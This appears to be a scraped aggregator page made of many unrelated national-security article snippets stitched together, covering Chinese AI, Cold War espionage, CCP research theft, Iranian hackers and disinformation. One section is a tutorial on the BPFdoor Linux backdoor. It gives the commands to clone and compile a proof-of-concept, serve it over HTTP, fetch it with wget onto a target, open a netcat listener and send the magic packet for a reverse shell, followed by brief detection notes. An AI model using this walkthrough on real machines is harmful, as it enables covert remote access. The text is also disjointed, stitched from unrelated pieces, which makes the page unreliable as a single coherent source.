The argument in Washington over the past few months has been about whether to ban Chinese AI models or restrict them. What has been less examined is what Beijing intends to do with the open-weight – that is, publicly available and downloadable – models its labs have built. Beijing has started to answer that question, and not with one voice.
Casual observers of Venezuelan politics might have assumed that the US capture and removal of former Venezuelan president Nicolas Maduro in January would guarantee the dismantling of his authoritarian regime and a rupture with Beijing.
First-of-its-kind research from Finland’s Aalto University’s School of Business reveals the modus operandi and operating model of the pro-Russian hacking group responsible for thousands of Distributed Denial of Service (DDoS) attacks against NATO and European targets.
In a recent paper published in the journal Royal Society Open Science, the team describes an AI tool it built to develop “pre-bunking” messages, a proactive communication technique intended to prevent the spread of misinformation by warning people of false claims before they encounter them.
For decades after the Cuban Revolution’s victory in 1959, influential anticommunist circles in the United States claimed that Cuba’s communist government sowed social division and allied with left-wing groups to help defeat Washington during the Cold War.
On Election Day in 2024, as voters cast their ballots, Elon Musk posted a campaign music video supporting Donald Trump’s bid for president.
Set to Van Halen’s “Jump,” with a montage of 1980s cultural references and images of Trump in various strongman poses, the video includes a line about “PATRIOTS” in which the “O” turns into a “Q,” a reference to the online conspiracy theory QAnon.
OAuth Exploitation Russian threat actors are shifting away from plain old password theft and moving toward legitimate platform features like OAuth permissions. Groups like UNC6293 and UNC7005 take their time...
Western universities and laboratories are on the frontlines of a battle over talent and technology. This assertion may seem like scaremongering, but when cold hard facts are considered, it is unfortunately true. The Chinese Communist Party (CCP) is undertaking an unprecedented assault to obtain scientific and technical research from the west. The broad CCP assault requires an equally broad response that must now include vetting for insider threats at universities and laboratories to bolster research security.
Spies Among Friends
In the present context, insider threats can be most usefully understood as existing on a spectrum, from fully paid-up agents (a spy in popular parlance) to research collaboration that could benefit a hostile foreign power.
There is a long history of hostile states exploiting academic freedoms at western universities. A hundred years ago, because the Soviet government had few diplomatic relations with foreign governments, it relied on intelligence officers without diplomatic cover, known as illegals. One of the earliest known illegals entered MIT as a student in 1938, Semyon Markovich Semyonov (codename TVEN). He was tasked with collecting scientific and technical research. It was, however, in the other Cambridge, in England, where Soviet intelligence had its greatest success. The Cambridge Five – Kim Philby, Guy Burgess, Donald McClain, Anthony Blunt, and John Cairncross – were all recruited at or soon after leaving Cambridge University in the 1930s. The Cambridge Spies were each motived by communist ideology, shaped by their intellectual discussions at Cambridge. During World War II, they became hugely damaging Soviet agents inside the British government. Some of the most important intelligence they gave to Moscow was the activities of codebreakers at Britian’s Bletchley Park.
The greatest Soviet insider threats occurred at an American top secret wartime laboratory to build the world’s first atomic bomb. The MANHATTAN Project was fully penetrated by Soviet agents. The Soviet agent, Klaus Fuchs, a brilliant physicist working at Los Alamos National Lab, provided Moscow blueprints and calculations for the atomic bomb. He was motivated by his communist ideology and the belief that nuclear weapons should not be held by one power alone. Fuchs later said that he divided his mind into two compartments: one for his friends and colleagues, the other for his communist beliefs, with the latter always superseding the former. It was, Fuchs said, a kind of controlled schizophrenia which allowed him to betray his friends and colleagues. Soviet espionage at the MANHATTAN Project accelerated Soviet development of Moscow’s own atomic bomb. Accelerating research and development is the essence of what espionage can achieve. The intelligence provided by Fuchs and other agents at Los Alamos meant that when the Soviets detonated their first atomic bomb, in 1949, it was an exact replica of the weapon the US dropped on Nagasaki four years earlier.
After the end of the Cold War, in the 1990s, Chinese espionage replaced Soviet intelligence at Los Alamos. At the end of that decade, Chinese intelligence was discovered to have obtained nuclear secrets from the New Mexico laboratory. 9/11 interrupted and distracted the US response to Chinese intelligence at Los Alamos.
Vetting
The penetration of the Cambridge Spies and agents like Klaus Fuchs, represented one of the greatest failures of western security in modern time. They were able to inflict their damage thanks to inadequate vetting by the British government. At the time, British vetting relied on a cross check on MI5 records. There were no proactive investigations into applicants’ backgrounds. The obvious flaw in the system was that if a candidate distanced himself or herself from communist associations there would be no traces in MI5 records. The Soviet recruiters of the Cambridge Five skillfully got them to do exactly that: breakaway from all communist groups. Thus, the Cambridge Five were able to slip through the British security net. Only later did MI5 obtain records of the Cambridge University socialist club, which contained names of the Cambridge Five and which could have provided important clues to their true motivation.
After the identification of the Cambridge Spies, beginning in 1951, the British government belatedly introduced positive vetting – in which there were intrusive investigations into a candidate’s background. Today the process is known as Developed Vetting. As the recent scandal of Lord Mandelson’s appointment to British Ambassador in Washington shows, the process of Developed Vetting is purely advisory. The decision to employ an applicant is up to the employing body itself.
In the CCP Crosshairs
The CCP has a strategy to exploit western research and development. The CCP has instigated a number of talent programs, by which Chinese researchers are sent to western institutions, but are then required to return to China, bringing the fruits of their research with them. A variant of CCP talent programs is to exploit Chinese diaspora scientists at western institutions, often by blackmailing them through family members and China itself. Such talent programs are part of the CCP’s national rejuvenation program by which it seeks to replace the United States as the world’s leading economic and military power. The CCP demands that any research and development that cannot be delivered from homegrown talent must be obtained from overseas. As well as talent programs, the CCP also exploits research collaboration with western universities and laboratories. There is in principle nothing wrong with this, as long as such western institutions appreciate that the CCP will try to steal any intellectual property produced by such collaborations. The problem arises when western scientists hide their connections to Chinese entities, as was the case with former Harvard professor of chemistry, Charles Lieber.
Frequently Chinese researchers are not forthcoming about their continued affiliation with the Chinese military. For example, open-source data obtained and analyzed by a private sector strategic intelligence firm, Strider Technologies, shows that since 2020 over 8,000 STEM publications have involved collaboration between Chinese military entities and more than 100 UK institutions. The Chinese – UK research collaboration includes dual use technology – those with civilian and military application – such as hypersonics and antijamming communications.
Russia is also pursuing research collaborations with western institutions, with the aim of obtaining dual use technologies[CW1] .
A new approach
There will always be a need for traditional vetting for sensitive positions in western governments involving national security. It would, however, be mistaken to think that such vetting is comprehensive.
In the past, vetting required full state-backed resources. Today, that is no longer the case. Private sector companies are now able to use AI driven open-source data to reveal insider threats which, in some cases, western governments have missed. In 2022, for example it was revealed that a group of Chinese scientists working at none other than Los Alamos returned to China bringing with them research into defense technologies like hypersonics. The perversity of this situation cannot be overstated: US national defense research was benefiting the principal US adversary.
Bold action is needed. Western governments would be well advised to establish oversight bodies to identify vulnerabilities in research with military or dual use application. All such research positions can and should be vetted by open-source private sector providers. A subset of academics and civil libertarians will inevitably denounce this as unduly invasive. The fact that such vetting would be based on open-source data should, however, ameliorate those concerns. Furthermore, incase there are concerns about racial profiling, the vetting would pertain to the research positions not researchers themselves.
Ultimately the issue at stake is about western economic security – the intellectual property that will provide western economic prosperity. Think of western AI frontier laboratories. The question is whether the west is prepared to allow the secrets of this century’s technologies to be transferred to the west’s principal strategic adversaries, China and Russia.
The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals. Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.
Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.
Read more expert-driven national security insights, perspective and analysis in The Cipher Brief
Seventeen Iranian men have been charged in a cybercrime case being prosecuted by the U.S. Attorney for the Southern District of New York.
The accused are members of the Mabna Institute, an Iranian-based company known for hacking U.S. higher education institutions and private sector companies on behalf of the Islamic Republic of Iran’s Islamic Revolutionary Guard Corps (IRGC).
The United States has had enough in cyberspace. The White House has now created a program under which American companies can conduct offensive cyber operations against ransomware gangs and other ‘cyber-enabled transnational criminal organizations.’
During election seasons or major national issues, online news comment sections often become heated spaces of conflict across gender, generation, and political lines. For years, there have been persistent concerns that behind some of these conflicts may lie “foreign winds,” or interventions by foreign actors seeking to manipulate public opinion and deepen social divisions.
Do you ever see comments on social media that seem way off topic, but still manage to wrench the discussion around to divisive political debate?
A discussion about the cost of living suddenly becomes an argument about immigration. A conversation about the war in Ukraine turns into claims about government corruption. It can feel jarring – and sometimes this is deliberate.
The following is a speech delivered by ASPI executive director Justin Bassi at the Australian Defense Science, Technology and Research Summit, held in Adelaide from 4 to 6 August 2026.
Just over 10 years ago, I sat in the oval office with my then boss Malcolm Turnbull and President Obama listening to them debate the Thucydides Trap. This is a theory that has made Graham Allison famous but for which, in my view, there is no modern-day example – where the established power is so anxious about the rising power that it strikes at the rising power and starts a war.
As you might know, not all dangerous threats are the loud ones. We often hear about ransomware campaigns that paralyze companies and demand money. Money is the key factor in these operations. If the victim pays once and gets their decryption key, there’s a chance they will pay a second time. That means the key must be delivered to the victim. Total destruction isn’t really the objective here. Things need to stay in a state where they can be fixed within a short period of time if the victim pays.
With state sponsored APTs, things are a bit different. Given the strategy China has right now in regards to the West, they’re trying to preposition themselves for a future conflict, so gaining as much access as possible is the current goal. Once things go south, all that compromised infrastructure starts crippling systems in a bid to cause as much damage as possible. That’s what happened before and during the first days of the Russian invasion of Ukraine and other countries, so there’s a good chance that’s what will happen during an active conflict with China.
An investigation by Rapid7 Labs found evidence of an advanced China nexus threat actor known as Red Menshen. This group has been placing stealthy digital sleeper cells inside telecommunications networks. These are long-term operations built for persistence and access to sensitive environments, including government infrastructure.
At the center of this activity is BPFdoor.
What is BPFDoor
BPFdoor doesn’t behave like conventional malware. It doesn’t open a visible listening port or maintain a C2 channel. BPFdoor is a passive Linux backdoor that works at a very low level in the system. It uses the Berkeley Packet Filter (BPF), which is a feature inside the Linux kernel designed for packet filtering and analysis. Normally, BPF is used for legitimate purposes such as monitoring. In this case, it is being abused. The backdoor attaches itself to a raw network socket and inspects incoming traffic. It can actually see packets before firewall ruleshave a chance to process them. So even if your firewall is configured correctly, the backdoor can still see traffic that should have been blocked.
Most of the time, the backdoor does nothing. It remains completely dormant, which makes it difficult to detect through behavior. It just waits for a “magic packet”. That magic packet has a predefined pattern known only to the hacker. When it arrives, the backdoor wakes up and gives the hacker a reverse shell, so that he doesn’t expose the entry point.
For this article we will use a simplified PoC. It doesn’t include advanced features such as encryption, persistence or espionage modules. But it’s enough to show the core idea and that’s what matters for our learning. The original rootkit can be found here.
Setting Up
We begin by cloning the repository and modifying the trigger file. That’s the file responsible for sending the magic packet that activates the backdoor.
kali > git clone https://github.com/pjt3591oo/bpfdoor.git
kali > cd bpfdoor
kali > vim trigger.c
Inside trigger.c you need to specify two IP addresses. One is the target machine where the backdoor will run, and the other is your attacking machine. We used Kali for this.
You will notice a small detail in the code, a character ‘X’ placed before the IP address. It is a simple magic byte used by the PoC to identify valid trigger packets. It should not be removed, as it is part of the mechanism that wakes up the backdoor.
Once the file is ready, you compile both the trigger and the backdoor.
kali > gcc trigger.c -o trigger
kali > gcc bpfdoor -o bpfdoorpoc
kali > chmod +x trigger
After compiling, we are ready to move to the target system.
Exploitation
To move further we need to transfer the backdoor. There are different methods available for it. You can use temp.sh or a simple HTTP server.
Pick whatever is best for you and download it.
kali > python3 -m http.server 9001
ubuntu > wget http://192.168.56.107:9001/bpfdoorpoc
Once the file is downloaded, you make it executable and run it.
At this point, the rootkit appears to hang. This is expected behavior. The backdoor is now running in the background, waiting for the magic packet. You might see some output, but nothing really tells you what it’s doing.
Set up a listener on Kali to receive your reverse shell
kali > nc -lvnp <port>
The trigger sends a packet that the backdoor recognizes.
In a separate terminal you execute the trigger:
kali > ./trigger
The trigger sends a packet that the backdoor recognizes.
The moment it detects the correct pattern, it activates and sends you back a reverse shell. If everything is correct, you will see a connection. It’s a working shell on the target system.
This is the core idea behind BPFdoor.
Detection
The backdoor has been known since around 2022, but only recently has it been observed being actively used in attacks against telecommunications infrastructure. To detect it we can use a script made by Rapid7.
The script attempts to find suspicious processes that match the behavior of BPFdoor. In our case, it found the PoC process and reported its process ID. Even stealthy malware can leave traces. Detection comes down to understanding how the system is supposed to behave (baseline) and finding deviations from it.
Summary
BPFdoor is an advanced Linux backdoor with a different approach to persistence and remote access. It’s being used by the Chinese to access our sensitive data. The whole Chinese campaign is about prepositioning the country for future global conflicts, so they can gain the upper hand in the chaos of a cyberwar. Their backdoor hides within the normal operation of the kernel and waits for a specific trigger. That makes it really hard to spot.
Telecoms have always been a desirable target along with industrial control systems. In light of these attacks, we started training on Building Your Own Mobile 4G Base Station. You’ll get to learn not just how to build a station, but how hackers attack it and how you can defend it. The knowledge is truly unique and a lot of work has gone into making the training.
Long after COVID-19 ended, China is still trying to shape the world’s perception of the pandemic.
On August 6, FDD’s Center on Cyber and Technology Innovation (CCTI) identified at least 50 coordinated assets across 10 platforms spreading claims that U.S. biological laboratories developed bioweapons that caused COVID-19. This network revives a longstanding Chinese effort to shift blame for the pandemic and portray Washington as a biological threat.
Intelligence is useful only if it tells policymakers what they need to know, not what they want to hear. That distinction—between informing power and flattering it—is the oldest problem in the craft, and the U.S. built an apparatus of analytic standards, layered review, and ombudsmen to protect it. I served as a President’s Daily Brief (PDB) briefer to the vice president, in analytic leadership at the CIA, and as a National Security Council (NSC) director in both the Biden and second Trump administrations.
Overview of the Advisory On July 23, 2026, CISA, the NSA, the FBI, and their international partners issued a joint cybersecurity advisory alerting organizations to ongoing Russian state-sponsored activity. The...